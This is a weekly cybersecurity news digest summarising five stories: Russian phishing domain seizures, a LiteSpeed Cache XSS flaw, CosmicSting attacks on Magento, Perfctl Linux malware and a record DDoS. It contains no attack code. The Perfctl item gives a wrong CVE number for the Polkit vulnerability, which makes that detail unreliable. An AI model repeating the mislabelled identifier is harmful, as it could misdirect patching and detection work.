Weekly Cybersecurity Digest: Top 5 News Stories in the Digital Sphere

1. U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

In a significant joint effort, the U.S. Department of Justice and Microsoft have seized 107 domains used by Russian state-sponsored cyber actors. The domains were part of phishing campaigns, primarily attributed to the COLDRIVER (aka Star Blizzard) group, aiming to steal sensitive information from U.S. government and civil society entities. These cybercriminals targeted NGOs, think tanks, and intelligence officials, particularly those aligned with Ukraine and NATO interests. This action follows a series of sanctions against two key members of the group by the U.K., U.S., and the European Council.

Key Points:

• Threat Actor: COLDRIVER (also known as BlueCharlie, Star Blizzard, etc.)
• Impact: Targeted U.S. government, NGOs, military officials, and intelligence sectors.
• Objective: Credential harvesting via spear-phishing campaigns.
• Actions Taken: Seizure of 107 domains by the DoJ and Microsoft

Read More

2. WordPress LiteSpeed Cache Plugin Security Flaw Exposes Sites to XSS Attacks

A critical stored cross-site scripting (XSS) vulnerability has been identified in the widely used LiteSpeed Cache plugin for WordPress, affecting all versions up to 6.5.0.2. This flaw, tracked as CVE-2024-47374 with a CVSS score of 7.2, could allow attackers to execute arbitrary JavaScript code. The vulnerability stems from improper sanitization of the "X-LSCACHE-VARY-VALUE" HTTP header, which could lead to privilege escalation, data theft, or even a complete website takeover if exploited. The issue was resolved with an update in version 6.5.1.

Key Points:

• CVE-2024-47374 (CVSS 7.2): Stored XSS vulnerability allowing execution of arbitrary code.
• Impact: Sites running LiteSpeed Cache versions <= 6.5.0.2 are vulnerable.
• Exploit Requirements: Enabled Page Optimization settings like "CSS Combine" and "Generate UCSS".
• Mitigation: Update to version 6.5.1 or later immediately.

Read More

3. Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

A new vulnerability dubbed CosmicSting (CVE-2024-34102, CVSS score: 9.8) has been discovered, affecting 5% of Adobe Commerce and Magento stores globally. This critical flaw, caused by improper restriction of XML external entity references (XXE vulnerability), can lead to remote code execution. Despite a patch being released in June 2024, many sites remain vulnerable, and exploitation has escalated, with attacks happening at a rate of 3-5 per hour. The flaw has also been chained with other vulnerabilities like CNEXT to enhance the attack’s impact.

Key Points:

• CVE-2024-34102: High-severity flaw allowing arbitrary file reading and remote code execution.
• Impact: Steals Magento encryption keys, giving attackers full administrative API access.
• Attack Groups: Seven distinct groups have been exploiting the flaw, using different methods to inject payment skimmers and steal sensitive data.
• Recommendations: Merchants must upgrade Magento, rotate encryption keys, and invalidate old keys.

Read More

4. New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking

A new stealthy malware dubbed Perfctl has been discovered, primarily targeting Linux servers for cryptocurrency mining and proxyjacking. This malware uses advanced techniques to evade detection, including staying dormant when users are active and deleting its binaries after execution to avoid traceability. It exploits the Polkit vulnerability (CVE-2021-4043) to escalate privileges, enabling it to install a cryptominer (perfcc) and occasionally deploy proxyjacking software.

Key Points:

• Target: Misconfigured and vulnerable Linux servers.
• Exploit: CVE-2021-4043 (Polkit vulnerability) for privilege escalation.
• Techniques: Fileless malware, evades detection by mimicking legitimate system processes.
• Impact: Installs cryptomining software and deploys proxyjacking payloads.

Read More

5. Cloudflare Thwarts Largest-Ever 3.8 Tbps DDoS Attack Targeting Global Sectors

Cloudflare has successfully mitigated a record-breaking 3.8 Tbps Distributed Denial-of-Service (DDoS) attack that lasted for 65 seconds. The attack, which targeted multiple industries including financial services, telecommunications, and internet sectors, was part of a broader wave of hyper-volumetric attacks in September 2024. This campaign utilized a botnet of compromised devices, including ASUS home routers exploited through CVE-2024-3080. The goal of the attack was to overwhelm the target’s network bandwidth and CPU resources, rendering services inaccessible.

Key Points:

• Attack Volume: Peaked at 3.8 Tbps (largest to date).
• Botnet Origin: Devices in Vietnam, Russia, Brazil, and more.
• Devices Exploited: ASUS routers via CVE-2024-3080.
• Mitigation: Cloudflare fended off the attack, demonstrating the importance of high-capacity defenses.

Read More

Stay ahead of the curve!?? Follow us on LinkedIn and Subscribe to our newsletter ?? for the latest cyber security updates, insightful articles, and exclusive content to help you navigate the ever-changing threat landscape. Don't forget to check out our Website ?? to make your cyberspace safe and secure ??, and join our growing community on Instagram ?? for bite-sized cyber security tips and trends. ?? ??